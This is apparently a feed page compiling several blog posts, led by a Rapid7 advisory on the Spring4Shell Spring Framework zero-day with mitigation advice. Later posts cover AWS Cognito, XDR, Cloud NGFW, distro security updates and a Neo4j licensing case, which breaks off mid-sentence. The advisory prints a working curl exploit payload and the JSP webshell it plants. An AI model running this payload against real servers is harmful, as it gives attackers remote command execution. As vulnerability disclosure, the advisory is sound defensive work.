Spring4Shell: Zero-Day Vulnerability in Spring Framework

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/


If you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from Log4Shell. While discovery and research are evolving, we’re posting the facts we’ve gathered and updating guidance as new information becomes available.

What Rapid7 customers can expect

Our team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.

Our team will be updating this blog continually. Our next update will be at 9 PM EDT on March 30, 2022.

Introduction

On March 30, 2022, rumors began to circulate about an unpatched remote code execution (RCE) vulnerability in Spring Framework when a Chinese-speaking researcher published a GitHub commit that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by Spring.io (a subsidiary of VMware) and is used by many Java-based enterprise software frameworks. The proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly deleted.


A lot of confusion followed for several reasons:

  • The researcher’s original technical writeup needed to be translated.
  • The vulnerability (and proof of concept) isn’t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below.
  • A completely different unauthenticated RCE vulnerability was published yesterday (March 29, 2022) for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.

Rapid7’s research team has confirmed the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it’s currently unclear which real-world applications use the vulnerable functionality. Depending on how widely that functionality is used, this could result in widespread exploitation or no exploitation at all.

Recreating exploitation

The vulnerability appears to affect functions that use the @RequestMapping annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a Spring Framework MVC demonstration:

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

/**
 * @author Ramesh Fadatare
 */
@Controller
public class HelloWorldController {

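	// Binding the HelloWorld POJO from request parameters is what the PoC
	// abuses: the binder will also resolve nested property paths such as
	// class.module.classLoader..., which the payload uses to reconfigure
	// Tomcat's logging (see the curl command below).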
	@RequestMapping("/rapid7")
	public void vulnerable(HelloWorld model) {
	}
}

Here we have a controller (HelloWorldController) that, when loaded into Tomcat, will handle HTTP requests to http://name/appname/rapid7. The function that handles the request is called vulnerable and has a POJO parameter, HelloWorld. Here, HelloWorld is stripped down, but the POJO can be quite complicated if need be:

package net.javaguides.springmvc.helloworld.model;

public class HelloWorld {
	private String message;
}

And that’s it. That’s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)

If we compile the project and host it on Tomcat, we can then exploit it with the following curl command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):

curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT/rapid7

This payload drops a password-protected webshell in the Tomcat ROOT directory called tomcatwar.jsp, which looks like this:

- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -

Attackers can then invoke commands. Here is an example of executing whoami to get albinolobster:

Screenshot showing the whoami command returning albinolobster via the dropped webshell

The Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.

About the payload

The payload we’ve used is specific to Tomcat servers. It uses a technique that was popular as far back as 2014: altering the Tomcat server’s logging properties via ClassLoader. The payload simply redirects the logging logic to the ROOT directory and drops the file containing the webshell payload. A good technical writeup can be found here.

This is just one possible payload and will not be the only one. We’re certain that malicious class-loading payloads will appear quickly.

Mitigation guidance

This zero-day vulnerability is unpatched and has no CVE assigned as of March 30, 2022. The Spring documentation for DataBinder explicitly notes:

… [T]here are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.

Therefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.
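For custom applications, a minimal sketch of that guardrail might look like the following, building on the earlier HelloWorldController example. The allowed field name ("message"), the mapping path, and the disallowed-field patterns are illustrative assumptions; tailor them to the fields your forms actually bind.

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

@Controller
public class HardenedHelloWorldController {

	// Restrict data binding to the fields the form actually needs, so
	// property paths such as class.module.classLoader.* are never bound.
	@InitBinder
	public void initBinder(WebDataBinder binder) {
		binder.setAllowedFields("message");
		// Alternatively (or additionally), deny ClassLoader traversal outright
		// (a commonly suggested deny-list style workaround, not a complete fix):
		// binder.setDisallowedFields("class.*", "Class.*", "*.class.*", "*.Class.*");
	}

	@RequestMapping("/hardened")
	public void hardened(HelloWorld model) {
	}
}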

If your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.

Until a patch is available, and if an organization is unable to use the above mitigations, one failsafe option is to model process executions on systems that run these Spring-based applications and then monitor for anomalous, “post-exploitation” attempts. These should be turned into alerts and acted upon immediately by incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.

Vulnerability disambiguation

There has been significant confusion about the zero-day vulnerability we discuss in this blog post because an unrelated vulnerability in another Spring project was published yesterday (March 29, 2022). That vulnerability, CVE-2022-22963, affects Spring Cloud Function, which is not in Spring Framework. Spring released versions 3.1.7 and 3.2.3 to address CVE-2022-22963. CVE-2022-22963 is completely unrelated to the zero-day RCE under investigation in this blog post.

Further, yet another vulnerability, CVE-2022-22950, was assigned on March 28, and a fix was released the same day. To keep things confusing, this medium-severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 to 5.3.16. This CVE is completely unrelated to the zero-day RCE under investigation in this blog post.


[$] Systemd discusses its kernel-version needs

Post Syndicated from original https://lwn.net/Articles/889610/

A query regarding the possibility of dropping support for older kernels in systemd led to some discussion on the systemd-devel mailing list recently. As might be guessed, exactly which kernel would be the minimum supported, what kernel features systemd is using, and when those kernel features became available were all part of that conversation. A component like systemd that is closely tied to the kernel, and the interfaces different versions provide, has a number of different factors to consider when making a decision of this sort.

[Security Nation] David Rogers on IoT Security Legislation

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/03/30/security-nation-david-rogers-on-iot-security-legislation/


In this episode of Security Nation, Jen and Tod chat with David Rogers, CEO at Copper Horse Ltd., about the Product Security and Telecommunications Infrastructure (PSTI) bill, a new piece of IoT security legislation in the UK. He runs through the new regulations that the bill includes for manufacturers of connected smart devices – including everything from home products to health devices – and details all the many steps it takes to get legislation like this signed into law.

Stick around for our Rapid Rundown, where Tod and Jen talk about the latest edition of Rapid7’s Vulnerability Intelligence Report, which covers all the need-to-know vulnerabilities from 2021, a year that began with SolarWinds and ended with Log4j (i.e. a VERY busy year for this sort of thing).

David Rogers


David is a mobile phone and IoT security specialist who runs Copper Horse Ltd, a software and security company based in Windsor, UK. His company is currently focusing on product security for the Internet of Things, as well as future automotive cybersecurity.

David chairs the Fraud and Security Group at the GSMA and sits on the Executive Board of the Internet of Things Security Foundation. He authored the UK’s Code of Practice for Consumer IoT Security, in collaboration with UK government and industry colleagues, and is a member of the UK’s Telecoms Supply Chain Diversification Advisory Council.

He has worked in the mobile industry for over 20 years in security and engineering roles. Prior to this, he worked in the semiconductor industry. David holds an MSc in Software Engineering from the University of Oxford and an HND in Mechatronics from the University of Teesside. He lectured in Mobile Systems Security at the University of Oxford from 2012 to 2019 and served as a Visiting Professor in Cyber Security and Digital Forensics at York St John University.

He was awarded an MBE for services to Cyber Security in the Queen’s Birthday Honours 2019.

He blogs from https://mobilephonesecurity.org and tweets at @drogersuk.

Show notes

Interview links

Rapid Rundown links


Enriching Amazon Cognito features with an Amazon API Gateway proxy

Post Syndicated from Mahmoud Matouk original https://aws.amazon.com/blogs/architecture/enriching-amazon-cognito-features-with-an-amazon-api-gateway-proxy/

This post was co-written with Geoff Baskwill, member of the Architecture Enabling Team at Trend Micro. At Trend Micro, we use AWS technologies to build secure solutions to help our customers improve their security posture.


This post builds on the architecture originally published in Protect public clients for Amazon Cognito with an Amazon CloudFront proxy. Read that post to learn more about public clients and why it is helpful to implement a proxy layer.

We’ll build on the idea of passing calls to Amazon Cognito through a lightweight proxy. This pattern allows you to augment identity flows in your system with additional processing without having to change the client or the backend. For example, you can use the proxy layer to protect public clients as explained in the original post. You can also use this layer to apply additional fraud detection logic to prevent fraudulent sign up, propagate events to downstream systems for monitoring or enhanced logging, and replicate certain events to another AWS Region (for example, to build high availability and multi-Region capabilities).

The solution in the original post used Amazon CloudFront, Lambda@Edge, and AWS WAF to implement protection of public clients, and hinted that there are multiple ways to do it. In this post, we explore one of these alternatives by using Amazon API Gateway and a proxy AWS Lambda function to implement the proxy to Amazon Cognito. This alternative offers improved performance and full access to request and response elements.

Solution overview

The focus of this solution is to protect public clients of the Amazon Cognito user pool.

The workflow is shown in Figure 1 and works as follows:

  1. Configure the client application (mobile or web client) to use the API Gateway endpoint as a proxy to an Amazon Cognito regional endpoint. You also create an application client in Amazon Cognito with a secret. This means that any unauthenticated API call must have the secret hash.
  2. Use a Lambda function to add a secret hash to the relevant incoming requests before passing them on to the Amazon Cognito endpoint. This function can also be used for other purposes like logging, propagation of events, or additional validation.
  3. In the Lambda function, you must have the app client secret to be able to calculate the secret hash and add it to the request. We recommend that you keep the secret in AWS Secrets Manager and cache it for the lifetime of the function. (A sketch of the hash calculation follows this list.)
  4. Use AWS WAF with API Gateway to enforce rate limiting, implement allow and deny lists, and apply other rules according to your security requirements.
  5. Clients that send unauthenticated API calls to the Amazon Cognito endpoint directly are blocked and dropped because of the missing secret.
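To make step 3 concrete, below is a minimal sketch, in Java using only the JDK, of computing the SECRET_HASH value that Amazon Cognito expects when an app client has a secret: Base64 of an HMAC-SHA256 over username + client ID, keyed with the app client secret. The class and method names are illustrative assumptions.

import java.nio.charset.StandardCharsets;
import java.util.Base64;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class SecretHashUtil {

    // Computes Base64(HMAC-SHA256(username + clientId)) keyed with the app client secret.
    public static String secretHash(String username, String clientId, String clientSecret) {
        try {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(new SecretKeySpec(clientSecret.getBytes(StandardCharsets.UTF_8), "HmacSHA256"));
            byte[] raw = mac.doFinal((username + clientId).getBytes(StandardCharsets.UTF_8));
            return Base64.getEncoder().encodeToString(raw);
        } catch (Exception e) {
            throw new IllegalStateException("Unable to compute Cognito SECRET_HASH", e);
        }
    }
}

The proxy Lambda function would read the client secret from Secrets Manager (cached across invocations), compute this value, and add it as the SECRET_HASH parameter of applicable requests (for example, InitiateAuth or SignUp) before forwarding them to Amazon Cognito.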

Not shown: You may want to set up a custom domain and certificate for your API Gateway endpoint.


Figure 1. A proxy solution to the Amazon Cognito regional endpoint

Deployment steps

You can use the following AWS CloudFormation template to deploy this proxy pattern for your existing Amazon Cognito user pool.

Note: This template references a Lambda code package from a bucket in the us-east-1 Region. For that reason, the template can be only created in us-east-1. If you need to create the proxy solution in another Region, download the template and Lambda code package, update the template to reference another Amazon Simple Storage Service (Amazon S3) bucket that you own in the desired Region, and upload the code package to that S3 bucket. Then you can deploy your modified template in the desired Region.


This template requires the user pool ID as input and will create several resources in your AWS account to support the following proxy pattern:

  • A new application client with a secret will be added to your Amazon Cognito user pool
  • The secret will be stored in Secrets Manager and will be read from the proxy Lambda function
  • The proxy Lambda function will be used to intercept Amazon Cognito API calls and attach client-secret to applicable requests
  • The API Gateway project provides the custom proxy endpoint that is used as the Amazon Cognito endpoint in your client applications
  • An AWS WAF WebACL provides firewall protection to the API Gateway endpoint. The WebACL includes placeholder rules for Allow and Deny lists of IPs. It also includes a rate limiting rule that will block requests from IP addresses that exceed the number of allowed requests within a five-minute period (rate limit value is provided as input to the template)
  • Several helper resources will also be created like Lambda functions, necessary AWS IAM policies, and roles to allow the solution to function properly

After the stack is created successfully, you can find the endpoint URL in the Outputs section of your CloudFormation stack. This is the URL we use in the next section with client applications.

Note: The template and code have been simplified for demonstration purposes. If you plan to deploy this solution in production, make sure to review these resources for compliance with your security and performance requirements. For example, you might need to enable certain logs or log encryption or use a customer managed key for encryption.

Integrating your client with the proxy solution

Integrate the client application with the proxy by changing the endpoint in your client application to use the endpoint URL for the proxy API Gateway. The endpoint URL and application client ID are located in the Outputs section of the CloudFormation stack.

Next, edit your client-side code to forward calls to Amazon Cognito through the proxy endpoint and use the new application client ID. For example, if you’re using the Identity SDK, you should change this property as follows.

var poolData = {
  UserPoolId: '<USER-POOL-ID>',
  ClientId: '<APP-CLIENT-ID>',
  endpoint: 'https://<APIGATEWAY-URL>'
};

If you’re using AWS Amplify, change the endpoint in the aws-exports.js file by overriding the property aws_cognito_endpoint. Or, if you configure Amplify Auth in your code, you can provide the endpoint as follows.

Amplify.Auth.configure({
  userPoolId: '<USER-POOL-ID>',
  userPoolWebClientId: '<APP-CLIENT-ID>',
  endpoint: 'https://<APIGATEWAY-URL>'
});

If you have a mobile application that uses the Amplify mobile SDK, override the endpoint in your configuration as follows (don’t include AppClientSecret parameter in your configuration).

Note that the Endpoint value contains the domain name only, not the full URL. This feature is available in the latest releases of the iOS and Android SDKs.

"CognitoUserPool": {
  "Default": {
    "AppClientId": "<APP-CLIENT-ID>",
    "Endpoint": "<APIGATEWAY-DOMAIN-NAME>",
    "PoolId": "<USER-POOL-ID>",
    "Region": "<REGION>"
  }
}
WARNING: If you do an amplify push or amplify pull operation, the Amplify CLI overwrites customizations to the awsconfiguration.json and amplifyconfiguration.json files. You must manually re-apply the Endpoint customization and remove the AppClientSecret if you use the CLI to modify your cloud backend.

When to use this pattern

The same guidance for using this pattern applies as in the original post.

You may prefer this solution if you are familiar with API Gateway or if you want to take advantage of the following:

  • Use CloudWatch metrics from API Gateway to monitor the behavior and health of your Amazon Cognito user pool.
  • Find and examine logs from your Lambda proxy function in the Region where you have deployed this solution.
  • Deploy your proxy function into an Amazon Virtual Private Cloud (Amazon VPC) and access sensitive data or services in the Amazon VPC or through Amazon VPC endpoints.
  • Have full access to request and response in the proxy Lambda function

Extend the proxy features

Now that you are intercepting all of the API requests to Amazon Cognito, add features to your identity layer:

  • Emit events using Amazon EventBridge when user data changes. You can do this when the proxy function receives mutating actions like UpdateUserAttribute (among others) and Amazon Cognito processes the request successfully. (A minimal sketch follows this list.)
  • Implement more complex rate limiting than what AWS WAF supports, like per-user rate limits regardless of where IP address requests are coming from. This can also be extended to include fraud detection, request input validation, and integration with third-party security tools.
  • Build a geo-redundant user pool that transparently mitigates regional failures by replicating mutating actions to an Amazon Cognito user pool in another Region.
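As a sketch of the first item, here is one way the proxy (if implemented in Java with the AWS SDK for Java v2) could publish an event after Amazon Cognito successfully processes a mutating call. The event bus name, source, and detail-type strings are assumptions for illustration only.

import software.amazon.awssdk.services.eventbridge.EventBridgeClient;
import software.amazon.awssdk.services.eventbridge.model.PutEventsRequest;
import software.amazon.awssdk.services.eventbridge.model.PutEventsRequestEntry;

public class IdentityEventPublisher {

    private final EventBridgeClient eventBridge = EventBridgeClient.create();

    // Publish a small event when the proxy observes a successful mutating Cognito call.
    public void publishUserAttributesUpdated(String userPoolId, String username) {
        PutEventsRequestEntry entry = PutEventsRequestEntry.builder()
                .eventBusName("identity-events")            // assumed custom event bus
                .source("cognito.proxy")                    // assumed source string
                .detailType("UpdateUserAttributes")         // mirrors the Cognito action name
                .detail(String.format("{\"userPoolId\":\"%s\",\"username\":\"%s\"}",
                        userPoolId, username))
                .build();

        eventBridge.putEvents(PutEventsRequest.builder().entries(entry).build());
    }
}

Downstream consumers (monitoring, replication to another Region, fraud detection) can then subscribe to these events with EventBridge rules.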

Limitations

This solution has the same limitations highlighted in the original post. Keep in mind that resourceful authenticated users can still make requests to the Amazon Cognito API directly using the access token they obtained from authentication. If you want to prevent this from happening, adjust the proxy to avoid returning the access token to clients or return an encrypted version of the token.

Conclusion

In this post, we explored an alternative solution that implements a thin proxy to the Amazon Cognito endpoint. This allows you to protect your application against unwanted requests and enrich your identity flows with additional logging, event propagation, validations, and more.

Ready to get started? If you have questions about this post, start a new thread on the Amazon Cognito forum or contact AWS Support.

Demystifying XDR: The Time for Implementation Is Now

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/03/30/demystifying-xdr-the-time-for-implementation-is-now/


In previous installments of our conversation with Forrester Analyst Allie Mellen on all things extended detection and response (XDR), she helped us understand not only the foundations of the product category and its relationship with security information and event management (SIEM), but also the role of automation and curated detections. But Sam Adams, Rapid7’s VP of Detection and Response, still has a few key questions, the first of which is: What do XDR implementations actually look like today?

A tale of two XDRs

Allie is quick to point out that what XDR looks like in practice can run the gamut. That said, there are two broad categories that most XDR implementations among security operations centers (SOCs) fall under right now.

XDR all-stars

These are the organizations that “are very advanced in their XDR journey,” Allie said. “They are design partners for XDR; they’re working very closely with the vendors that they’re using.” These are the kinds of organizations that are looking to XDR to fully replace their SIEM, or who are at least somewhat close to that stage of maturity.

To that end, these security teams are also integrating their XDR tools with identity and access management, cloud security, and other products to create a holistic vision.

Targeted users

The other major group of XDR adopters is those utilizing the tool to achieve more targeted outcomes. They typically purchase an XDR solution and have this running alongside their SIEM — but Allie points out that this model comes with some points of friction.

“The end users see the overlapping use cases between SIEM and XDR,” she said, “but the outcomes that XDR is able to provide are what’s differentiating it from just putting all of that data into the SIEM and looking for outcomes.”




The common ground

This relatively stratified picture of XDR implementations is due in large part to how early-stage the product category is, Allie notes.

“There’s no one way to implement XDR,” she said. “It’s kind of a mishmash of the different products that the vendor supports.”

That picture is likely to become a lot clearer and more focused as the category matures — and Allie is already starting to see some common threads emerge. She notes that most implementations have a couple things in common:

  • They are at some level replacing endpoint detection and response (EDR) by incorporating more sources of telemetry.
  • They are augmenting (though not always fully replacing) SIEM solutions’ capabilities for detection and response.

Allie expects that over the next 5 years, XDR will continue to “siphon off” those use cases from SIEM. The last one to fall will likely be compliance, and at that point, XDR will need to evolve to meet that use case before it can fully replace SIEM.

Why now?

That brings us to Sam’s final question for Allie: What makes now the right time for the shift to XDR to really take hold?

Allie identifies a few key drivers of the trend:

  • Market maturity: Managed detection and response (MDR) providers have been effectively doing XDR for some time now — much longer than the category has been defined. This is encouraging EDR vendors to build these capabilities directly into their platforms.
  • Incident responders’ needs: SOC teams are generally happy with EDR and SIEM tools’ capabilities, Allie says — they just need more of them. XDR’s ability to introduce a wider range of telemetry sources is appealing in this context.
  • Need for greater ROI: Let’s be real — SIEMs are expensive. Security teams are eager to get the most return possible out of the tools they are investing so much of their budget into.
  • Talent shortage: As the cybersecurity skills shortage worsens and SOCs are strapped for talent, security teams need tools that help them do more with less and drive outcomes with a leaner staff.




For those looking to begin their XDR journey in response to some of these trends, Allie recommends ensuring that your vendor can offer strong behavioral detections, automated response recommendations, and automated root-cause analysis, so your analysts can investigate faster.

“These three things are really critical to building a strong XDR capability,” she said, “and even if it’s a roadmap item for your vendor, that’s going to give you a good basis to build from there.”

Want more XDR insights from our conversation with Allie? Check out the full talk.

Additional reading:

Security updates for Wednesday

Post Syndicated from original https://lwn.net/Articles/889682/

Security updates have been issued by CentOS (expat, firefox, httpd, openssl, and thunderbird), Debian (cacti), Fedora (kernel, rsh, unrealircd, and xen), Mageia (kernel and kernel-linus), openSUSE (apache2, java-1_8_0-ibm, kernel, openvpn, and protobuf), Oracle (openssl), Red Hat (httpd:2.4, kernel, kpatch-patch, and openssl), SUSE (apache2, java-1_7_1-ibm, java-1_8_0-ibm, kernel, openvpn, protobuf, and zlib), and Ubuntu (chromium-browser and paramiko).

New – Cloud NGFW for AWS

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-cloud-ngfw-for-aws/

In 2018 I wrote about AWS Firewall Manager (Central Management for Your Web Application Portfolio) and showed you how you could host multiple applications, perhaps spanning multiple AWS accounts and regions, while maintaining centralized control over your organization’s security settings and profile. In the same way that Amazon Relational Database Service (RDS) supports multiple database engines, Firewall Manager supports multiple types of firewalls: AWS Web Application Firewall, AWS Shield Advanced, VPC security groups, AWS Network Firewall, and Amazon Route 53 DNS Resolver DNS Firewall.

Cloud NGFW for AWS
Today we are introducing support for Palo Alto Networks Cloud NGFW in Firewall Manager. You can now use Firewall Manager to centrally provision & manage your Cloud next-generation firewall resources (also called NGFWs) and monitor for non-compliant configurations, all across multiple accounts and Virtual Private Clouds (VPCs). You get the best-in-class security features offered by Cloud NGFW as a managed service wrapped inside a native AWS experience, with no hardware hassles, no software upgrades, and pay-as-you-go pricing. You can focus on keeping your organization safe and secure, even as you add, change, and remove AWS resources.

Palo Alto Networks pioneered the concept of deep packet inspection in their NGFWs. Cloud NGFW for AWS can decrypt network packets, look inside, and then identify applications using signatures, protocol decoding, behavioral analysis, and heuristics. This gives you the ability to implement fine-grained, application-centric security management that is more effective than simpler models that are based solely on ports, protocols, and IP addresses. Using Advanced URL Filtering, you can create rules that take advantage of curated lists of sites (known as feeds) that distribute viruses, spyware, and other types of malware, and you have many other options for identifying and handling desirable and undesirable network traffic. Finally, Threat Prevention stops known vulnerability exploits, malware, and command-and-control communication.

The integration lets you choose the deployment model that works best with your network architecture:

Centralized – One firewall running in a centralized “inspection” VPC.

Distributed – Multiple firewalls, generally one for each VPC within the scope managed by Cloud NGFW for AWS.

Cloud NGFW protects outbound, inbound, and VPC-to-VPC traffic. We are launching with support for all traffic directions.

AWS Inside
In addition to centralized provisioning and management via Firewall Manager, Cloud NGFW for AWS makes use of many other parts of AWS. For example:

AWS Marketplace – The product is available in SaaS form on AWS Marketplace with pricing based on hours of firewall usage, traffic processed, and security features used. Cloud NGFW for AWS is deployed on a highly available compute cluster that scales up and down with traffic.

AWS Organizations – To list and identify new and existing AWS accounts and to drive consistent, automated cross-account deployment.

AWS Identity and Access Management (IAM) – To create cross-account roles for Cloud NGFW to access log destinations and certificates in AWS Secrets Manager.

AWS Config – To capture changes to AWS resources such as VPCs, VPC route configurations, and firewalls.

AWS CloudFormation – To run a StackSet that onboards each new AWS account by creating the IAM roles.

Amazon S3, Amazon CloudWatch, Amazon Kinesis – Destinations for log files and records.

Gateway Load Balancer – To provide resiliency, scale, and availability for the NGFWs.

AWS Secrets Manager – To store SSL certificates in support of deep packet inspection.

Cloud NGFW for AWS Concepts
Before we dive in and set up a firewall, let’s review a few important concepts:

Tenant – An installation of Cloud NGFW for AWS associated with an AWS customer account. Each purchase from AWS Marketplace creates a new tenant.

NGFW – A firewall resource that spans multiple AWS Availability Zones and is dedicated to a single VPC.

Rulestack – A set of rules that defines the access controls and threat protections for one or more NGFWs.

Global Rulestack – Represented by an FMS policy, contains rules that apply to all of the NGFWs in an AWS Organization.

Getting Started with Cloud NGFW for AWS
Instead of my usual step-by-step walk-through, I am going to show you the highlights of the purchasing and setup process. For a complete guide, read Getting Started with Cloud NGFW for AWS.

I start by visiting the Cloud NGFW Pay-As-You-Go listing in AWS Marketplace. I review the pricing and terms, click Continue to Subscribe, and proceed through the subscription process.

After I subscribe, Cloud NGFW for AWS will send me an email with temporary credentials for the Cloud NGFW console. I use the credential to log in, and then I replace the temporary password with a long-term one:

I click Add AWS Account and enter my AWS account Id. The console will show my account and any others that I subsequently add:

The NGFW console redirects me to the AWS CloudFormation console and prompts me to create a stack. This stack sets up cross-account IAM roles, designates (but does not create) logging destinations, and lets Cloud NGFW access certificates in Secrets Manager for packet decryption.

From here, I proceed to the AWS Firewall Manager console and click Settings. I can see that my cloud NGFW tenant is ready to be associated with my account. I select the radio button next to the name of the firewall, in this case “Palo Alto Networks Cloud NGFW” and then click the Associate button. Note that the subscription status will change to Active in a few minutes.

Screenshot showing the account association process

Once the NGFW tenant is associated with my account I return to the AWS Firewall Manager console and click Security policies to proceed. There are no policies yet, and I click Create policy to make one:

I select Palo Alto Networks Cloud NGFW, choose the Distributed model, pick an AWS region, and click Next to proceed (this model will create a Cloud NGFW endpoint in each in-scope VPC):

I enter a name for my policy (Distributed-1), and select one of the Cloud NGFW firewall policies that are available to my account. I can also click Create firewall policy to navigate to the Palo Alto Networks console and step through the process of creating a new policy. Today I select grs-1:

I have many choices and options when it comes to logging. Each of the three types of logs (Traffic, Decryption, and Threat) can be routed to an S3 bucket, a CloudWatch log group, or a Kinesis Firehose delivery stream. I choose an S3 bucket and click Next to proceed:

A screenshot showing the choices for logging.

Now I choose the Availability Zones where I need endpoints. I have the option to select by name or by ID, and I can optionally designate a CIDR block within each AZ that will be used for the subnets:

The next step is to choose the scope: the set of accounts and resources that are covered by this policy. As I noted earlier, this feature works hand-in-hand with AWS Organizations and gives me multiple options to choose from:

The CloudFormation template linked above is used to create an essential IAM role in each member account. When I run it, I will need to supply values for the CloudNGFW Account ID and ExternalId parameters, both of which are available from within the Palo Alto Networks console. On the next page I can tag my newly created policy:

On the final page I review and confirm all of my choices, and click Create policy to do just that:

My policy is created right away, and it will start to list the in-scope accounts within minutes. Under the hood, AWS Firewall Manager calls Cloud NGFW APIs to create NGFWs for the VPCs in my in-scope accounts, and the global rules are automatically associated with the created NGFWs. When the NGFWs are ready to process traffic, AWS Firewall Manager creates the NGFW endpoints in the subnets.

As new AWS accounts join my organization, AWS Firewall Manager automatically ensures they are compliant by creating new NGFWs as needed.

Next I review the Cloud NGFW threat logs to see what threats are being blocked by Cloud NGFW. In this example Cloud NGFW protected my VPC against SIPVicious scanning activity:

Screenshot showing the threat log detecting SIPVicious activity

And in this example, Cloud NGFW protected my VPC against a malware download:

a screenshot showing the threat log of malware detection

Things to Know
Both AWS Firewall Manager and Cloud NGFW are regional services and my AWS Firewall Manager policy is therefore regional. Cloud NGFW is currently available in the US East (N. Virginia) and US West (N. California) Regions, with plans to expand in the near future.

Jeff;

Stalking with an Apple Watch

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/stalking-with-an-apple-watch.html

The malicious uses of these technologies are scary:

Police reportedly arrived on the scene last week and found the man crouched beside the woman’s passenger side door. According to the police, the man had, at some point, wrapped his Apple Watch across the spokes of the woman’s passenger side front car wheel and then used the Watch to track her movements. When police eventually confronted him, he admitted the Watch was his. Now, he’s reportedly being charged with attaching an electronic tracking device to the woman’s vehicle.

An Erroneous Preliminary Injunction Granted in Neo4j v. PureThink

Post Syndicated from original http://ebb.org/bkuhn/blog/2022/03/30/neo4j-v-purethink-open-source-affero-gpl.html

[ A version of this article was also posted on Software Freedom Conservancy’s blog. ]

Bad Early Court Decision for AGPLv3 Has Not Yet Been Appealed

We at
Software Freedom Conservancy proudly and vigilantly watch out
for your rights under copyleft licenses such as the Affero GPLv3.
Toward this goal, we have studied the ongoing Neo4j, Inc. v. PureThink, LLC case in the Northern District of California, and the preliminary injunction appeal decision in
the Ninth Circuit Court this month. The case is complicated, and
we’ve seen much understandable confusion in the public discourse about the status of the case
and the impact of the Ninth Circuit’s decision to continue the trial court’s preliminary injunction while the case continues. While
it’s true that part of the summary judgment decision in the lower court bodes badly for an important provision in
AGPLv3§7¶4, the good news is that the case is not over, nor was
the appeal (decided this month) even an actual appeal of the
decision itself! This lawsuit is far from completion.

A Brief Summary of the Case So Far

The primary case in question is a dispute between Neo4j,
a proprietary
relicensing
company, against a very small company called PureThink, run by
an individual named John Mark Suhy. Studying the docket of the case, and a relevant related case, and
other available public materials, we’ve come to understand some basic facts and
events.
To paraphrase LeVar Burton, we encourage all our readers to not take our word (or anyone else’s) for it,
but instead take the time to read the dockets and come to your own
conclusions.

After canceling their formal, contractual partnership with Suhy, Neo4j alleged multiple claims
in court against Suhy and his companies. Most of these claims centered around trademark
rights regarding “Neo4j” and related marks. However, the
claims central to our concern relate to a dispute between Suhy and Neo4j regarding Suhy’s
clarification in downstream licensing of the Enterprise version that Neo4j distributed.

Specifically, Neo4j attempted to license the codebase under something they (later, in their Court filings)
dubbed the “Neo4j Sweden Software License” — which consists of a LICENSE.txt file containing
the entire text of the Affero General Public License, version 3
(“AGPLv3”) (a license that I helped write), and the
so-called
“Commons Clause”
— a toxic proprietary license. Neo4j admits that
this license mash-up (if legitimate, which we at Software Freedom
Conservancy and Suhy both dispute), is not an “open source
license”.

There are many complex issues of trademark and breach of other contracts
in this case; we agree that there are lots of
interesting issues there. However, we focus on the matter of most interest to us and many FOSS activists: Suhy’s permission to remove the “Commons
Clause”. Neo4j
